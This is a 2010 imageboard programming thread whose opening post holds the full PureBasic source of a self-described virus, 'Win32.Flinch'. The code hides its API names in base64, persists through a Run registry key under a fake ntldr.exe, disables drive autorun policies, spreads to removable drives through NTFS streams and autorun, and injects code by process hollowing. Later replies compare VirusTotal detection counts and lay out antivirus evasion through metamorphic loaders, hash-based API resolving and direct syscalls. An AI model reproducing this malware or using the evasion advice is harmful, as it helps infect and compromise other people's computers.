Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

Win32.Stream remake

Name: Anonymous 2010-03-24 9:47

Yes, my lovely /prog/ - I got utterly bored again. That time you would receive my variant of infamous NTFS-abusing virus. Rate it, colegas:

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Win32.Flinch v0.9 (Beta)
; Developed in 2010 by Alicia.
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EnableExplicit
#PSection = "fip+UFJJTUVfREFUQX4qfg=="
#Section = "OkZsaW5jaGVk"
#Resident = "bnRsZHIuZXhl"
#RegRunBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"
#RegDriveBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcRXhwbG9y
ZXJc"
#SIMark = "Kl9GbGluY0hfKl9GbGluY0hfKg=="
#NTDLL = "bnRkbGwuZGxs"
#K32DLL = "S2VybmVsMzIuZGxs"
#UnMapper = "WndVbm1hcFZpZXdPZlNlY3Rpb24="
#WPMemory = "V3JpdGVQcm9jZXNzTWVtb3J5"
#RPMemory = "UmVhZFByb2Nlc3NNZW1vcnk="
#ARunFile = "OlxXaW5OVC5jb20="
#LibLoad = #DONT_RESOLVE_DLL_REFERENCES | #LOAD_LIBRARY_AS_DATAFILE
#HiddenSystem = #PB_FileSystem_Hidden | #PB_FileSystem_System
#MegaByte = 1024 * 1024
#CrunchDelay = 45
#FirstDrive = 'C'
Define Letter.c, DType, TPath.s{#MAX_PATH}, MyName.S = ProgramFilename()
Global *WaitingMutex = CreateMutex()
Global MySize, Size2, *MyBody, CRC32
Global Dim Drives.a('Z'-#FirstDrive-1)
Declare IsARunner(Path.s)
Declare CrunchDrive(Letter.i)
Declare.S Decode64(String.S)
Declare RegSetStr(hKey, SubKey.S, ValueName.S, Dat.S)
Declare RegSetInt(hKey, SubKey.S, ValueName.S, Dat.I)
Declare RunPE(PName.S, lBuff, parameters.s)
Declare.s TempFileName()
Declare InfuseData(EXE.s, *DataPtr, DataSize, DataName.s)
Declare ExfuseData(*Module, DataName.s)
Declare CopyResources(SrcModule.s, DestModule.s)
; Hiding suspectable function calls.
Prototype UnmapSectionPT(*ProcessHandle, *BaseAdress)
Prototype WriteProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesWritten)
Prototype ReadProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesReaded)
Global UnmapSection_.UnmapSectionPT=GetProcAddress_(GetModuleHandle_(Decode64(#NTDLL)),Decode64(#UnMapper))
Global WriteProcess_.WriteProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#WPMemory))
Global ReadProcess_.ReadProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#RPMemory))
; Some macros:
Macro SetRegSettings()
RegSetStr(#HKEY_LOCAL_MACHINE, Decode64(#RegRunBranch), Decode64("TlQ0IGhvc3Rpbmcgc2VydmljZQ=="), MyName)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZUF1dG9SdW4="), 0)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZVR5cGVBdXRvUnVu"), 0)
EndMacro
; Resident's path retrieving.
GetSystemDirectory_(@TPath, #MAX_PATH)
If Right(TPath, 1) <> "\" : TPath + "\" : EndIf
TPath + Decode64(#Resident)
SetRegSettings()
; Main choice...
If UCase(MyName) = UCase(TPath)
; -Resident behavior-
; Checking for second execution.
If CreateSemaphore_(0, 0, 1, Decode64(#SIMark)) And GetLastError_() = #ERROR_ALREADY_EXISTS : End : EndIf
; Body retrieving.
MySize = FileSize(MyName)
*MyBody = AllocateMemory(MySize)
ReadFile(0, MyName)
ReadData(0, *MyBody, MySize)
CloseFile(0)
; Machine name's CRC32 retrieving...
TPath = Space(#MAX_COMPUTERNAME_LENGTH)
DType = #MAX_COMPUTERNAME_LENGTH
GetComputerName_(@TPath, @DType)
CRC32 = CRC32Fingerprint(@TPath, DType)
; ---------------------
; Drives loop.
TPath = Decode64("Kjpc")
Repeat : SetRegSettings(); Infinite loop
For Letter = #FirstDrive To 'Z' : PokeC(@TPath, Letter)
DType = GetDriveType_(@TPath); Retireving type of drive.
If DType => #DRIVE_REMOVABLE And DType <= #DRIVE_RAMDISK And DType <> #DRIVE_CDROM
; Testing if drive is already being crunched.
If Drives(Letter - #FirstDrive) = #False
Drives(Letter - #FirstDrive) = #True
CreateThread(@CrunchDrive(), Letter)
EndIf
EndIf
Next Letter
Delay(15 * 1000); Light pause for better mood.
ForEver
; ---------------------
Else
; -Agent behavior-
SetFileAttributes(TPath, #PB_FileSystem_Normal)
If CreateFile(1, TPath); If resident isn't already executed...
; Preparing body for transfer.
*MyBody = ExfuseData(#Null, Decode64(#PSection))
If *MyBody = #Null : ReadFile(0, MyName); If no prime found...
MySize = Lof(0) : *MyBody = AllocateMemory(MySize)
ReadData(0, *MyBody, MySize)
CloseFile(0)
Else : MySize = MemorySize(*MyBody)
EndIf
; Transferring body.
WriteData(1, *MyBody, MySize) : CloseFile(1)
EndUpdateResource_(BeginUpdateResource_(@TPath, #True), #False); Do not pack with UPX!
RunProgram(TPath)
FreeMemory(*MyBody)
EndIf; Now hiding it for sure:
SetFileAttributes(TPath, #HiddenSystem)
TPath = Decode64(#ARunfile)
; Original program's execution.
If IsARunner(MyName) = #False; If it isn't autorunner...
If ReadFile(0, MyName + Decode64(#Section)); Header
ReadFile(1, MyName); Main body - our code.
MySize = Lof(1) : *MyBody = AllocateMemory(MySize)
Size2 = Lof(0)  : ReadData(0, *MyBody, Size2)
FileSeek(1, Size2); Rewinding to read body
ReadData(1, *MyBody + Size2, MySize - Size2)
CloseFile(1)
CloseFile(0)
TPath = PeekS(GetCommandLine_())
RunPE(MyName, *MyBody, Right(TPath, Len(TPath) - Len(MyName) - 3))
Else : ! MOV EAX, [0]; Imitate error.
EndIf
; Imitate opening of drive in Explorer.
Else : RunProgram(Decode64("ZXhwbG9yZXIuZXhl"), Left(MyName, 3), "")
EndIf
EndIf

Name: Anonymous 2010-03-25 18:52

>>40
You're FUNNY!

Name: Anonymous 2010-03-25 20:17

>>39
http://xamayon.org/triagex.php ``faggot''

Name: Anonymous 2010-03-25 20:51

>>41

What about his funny?

Name: Anonymous 2010-03-26 4:42

Just if some someone didn't noticed: link in >>9 still valid.

Name: Anonymous 2010-03-26 5:44

>>44
what is it?

Name: Anonymous 2010-03-26 5:58

>>45
the url says "2-ch". so obviously, it's porn.

Name: Anonymous 2010-03-26 6:31

>>9
I really enjoy the improvisational piece very much, reminds me of Kandinsky. You have truly captured the process of your creation, and the tools you used clearly mated with the canvas quite well. It is pleasing to the eye. Your creation's context could possibly derive from the birth of the electronic keyboard in 1980's music, yet at the same time I'm reminded of the deep emotions seeded in a personal relationship between a boy and his first imaginary friend. The environment you grew up in has surely been reflected in this masterpiece.

Name: Anonymous 2010-03-26 6:35

>>47
Nice try but No.

Name: Anonymous 2010-03-26 6:54

http://i39.tinypic.com/2yopn4n.jpg

Now valid forever[1]

[1] Well, maybe not forever, but certainly will outlive the link that >>9 provided

Name: Anonymous 2010-03-27 3:44

just compiled it: around 8 detections. not too bad for non-crypted code, but still needs some stealth.

Name: Anonymous 2010-03-27 4:47

>>50

Um, VirusTotal ? If so, I already managed to reduce amount of detections to 6 in latest revision. Still needs some more work, however...

Name: Anonymous 2010-03-27 8:21

Awesome: just upgraded autorunning functionality by adding command for deletion of 'autorun.inf' directory. -1 positive on VirusTotal.

Name: Anonymous 2010-03-27 10:17

>>50-52
You do know there are fairly fullproof methods of having near perfect(it's impossible to get 100% clean now that symantec just flags every file it has never seen before as suspicious, which I find very offensive to those that actually don't produce malware, but have all their new updates flagged by their silly popularity-based detection) detection rates on virustotal? Such methods involve heavy metamorph transforms of the loader, manual API resolving(by hash), and calling to the kernel directly(find out ssdt offsets/ids by loading up ntdll and resolving from there). Current AVs suck balls (and will likely continue to do so for a while) at dealing with such things. I'd be surprised if any manage to detect anything if they function in userland only (and since MS added Patchguard, they can't do ring0 hooks to properly monitor things). Of course, those that run the file sandboxed and have a ring0 driver which can intercept the calls(patchguard disabled, or just run on xp or similar) will be able to use heuristics to find out if you're doing anything bad.

Name: Anonymous 2010-03-27 10:27

>>53
This is the greatest amount of bullshit in a single paragraph  I've seek this week.

Name: Anonymous 2010-03-27 11:23

>>1

Please re-write this in a readable language like C.

Name: Anonymous 2010-03-27 11:57

>>54
Oh really? I'd like to see you prove me wrong.

I've yet to see AVs which can properly handle morphed/VMed malware. Most of them are signature based, and the rest either have some primitive emulation or some active hook-based heuristics.

How do you propose an AV would catch some malware which just uses sysenter/int2F to do syscalls if they don't have a kernel driver which intercepts those calls(keep in mind, Microsoft prevented SSDT hooking as a legitimate method for AV vendors by implementing Patchguard).

Provide some proof for your words >>54, or IHBT.

Name: not >>54 2010-03-28 3:06

I agree with >>56 in essence.
>>53 was not very well written though.
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -